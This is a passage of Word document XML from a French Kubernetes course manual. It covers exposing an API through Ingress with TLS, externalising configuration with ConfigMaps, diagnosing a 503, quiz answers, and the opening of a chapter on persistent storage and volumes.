      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les applications sont exposées. Le chapitre suivant traite de ce qui persiste : stockage et état dans un cluster.</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67.1 — Exposer une API par Ingress</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 xml:space="preserve">L'API doit être joignable sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>api.exemple.fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en HTTPS.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Créez le Service.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Créez l'Ingress avec TLS.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le routage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 67.2 — Externaliser la configuration</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La même image doit fonctionner en recette et en production.</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Créez deux ConfigMaps.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Référencez-les par nom.</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la valeur effective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 67.3 — Diagnostiquer un 503</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 xml:space="preserve">L'ingress renvoie 503 pour </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>api.exemple.fr</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Vérifiez les endpoints.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Vérifiez les étiquettes.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les sondes.</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67.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Service</w:t>
        <w:br/>
        <w:t>metadata: { name: api, namespace: production }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector: { app: api }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ports: [{ port: 80, targetPort: 3000 }]</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: Ingress</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t xml:space="preserve">  annotations:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cert-manager.io/cluster-issuer: letsencrypt-prod</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ingressClassName: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tls:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - hosts: ["api.exemple.fr"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      secretName: api-tls</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - host: api.exemple.fr</w:t>
        <w:br/>
        <w:t xml:space="preserve">      http:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        paths:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          - path: /</w:t>
        <w:br/>
        <w:t xml:space="preserve">            pathType: Prefix</w:t>
        <w:br/>
        <w:t xml:space="preserve">            backend: { service: { name: api, port: { number: 80 } } }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cert-manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> crée le secret TLS à partir de l'annotation et du bloc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reste en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ClusterIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : seul l'ingress est exposé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 67.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kubectl create configmap api-config -n recette \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --from-literal=LOG_LEVEL=debug --from-literal=ENV=recette</w:t>
        <w:br/>
        <w:br/>
        <w:t>kubectl create configmap api-config -n production \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --from-literal=LOG_LEVEL=info --from-literal=ENV=production</w:t>
        <w:br/>
        <w:br/>
        <w:t>kubectl exec -n production deploy/api -- env | grep -E "LOG_LEVEL|ENV"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'image est identique : seule la configuration du namespace change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La vérification dans le pod évite de supposer que le déploiement a bien repris la configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 67.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kubectl get endpointslices -n production -l kubernetes.io/service-name=api</w:t>
        <w:br/>
        <w:t>kubectl get pods -n production --show-labels | grep app=api</w:t>
        <w:br/>
        <w:t>kubectl describe pod -n production -l app=api | grep -A5 Readiness</w:t>
        <w:br/>
        <w:br/>
        <w:t># Un pod non prêt ne figure pas dans les endpoints</w:t>
        <w:br/>
        <w:t>kubectl get pods -n production -o wide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un Service sans endpoint prêt renvoie 503 : soit aucune étiquette ne correspond, soit les pods ne sont pas prêts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une sonde readiness trop stricte retire tous les pods en même temps, ce qui produit exactement ce symptôme.</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 type de Service est interne au cluster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NodePort</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LoadBalancer</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ClusterIP</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ExternalName</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 renvoie un Service sans endpoint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200</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404</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503</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302</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 faut-il pour qu'un Ingress fonctionne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 secret TLS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Un contrôleur d'ingress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Un NodePort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Un pod dédié</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Un Secret Kubernetes est-il chiffré par défaut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Oui, avec AES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Non, seulement encodé en base64</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Oui, avec la clé du cluster</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Cela dépend du namespace</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Quel mode de configuration se met à jour sans redémarrage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envFrom</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env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ciblé</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Un volume monté</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Un argument de commande</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ClusterIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est joignable que depuis l'intérieur du cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le proxy n'a aucune destination : il renvoie une indisponibilité.</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Le contrôleur traduit l'Ingress en configuration de proxy.</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Seul le chiffrement au repos de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>etcd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protège réellement les valeurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le kubelet rafraîchit les fichiers montés depuis une ConfigMap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>68. Stockage et applications à état</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Faire tourner une base de données dans un orchestrateur sans perdre ses données.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Avancé · Prérequis : chapitre 67</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Distinguer stockage éphémère et persistant.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Choisir entre </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>emptyDir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>hostPath</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et volume persistant.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Comprendre </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PersistentVolume</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PersistentVolumeClaim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Utiliser un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>StatefulSet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> à bon escient.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Sauvegarder et restaurer des données de cluster.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>68.1 Un pod est remplaçable, une donnée ne l'est pas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Par conception, un pod peut être supprimé à tout moment. Toute donnée écrite dans son système de fichiers disparaît avec lui. Le stockage persistant est donc un choix explicite, pas un détail d'implémentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.248 — Quatre types de stockage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225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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Durée de vie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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Partage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>emptyDir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2028"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Celle du pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2366"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entre conteneurs du pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2366"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cache, temporaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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hostPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Celle du nœud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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Démon, cas particuliers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PersistentVolume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2028"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Indépendante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2366"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Selon le mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2366"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Données applicatives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Stockage objet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Indépendante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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236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Fichiers, sauvegardes</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VOLUME PERSISTANT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ressource de stockage provisionnée par un administrateur ou dynamiquement, indépendante du cycle de vie des pods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un volume éphémère partagé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emptyDir : partagé entre deux conteneurs du même pod</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">    emptyDir:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      sizeLimit: 500Mi</w:t>
        <w:br/>
        <w:t>volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">    mountPath: /var/cache/app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>68.2 PV, PVC et classes de stockage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
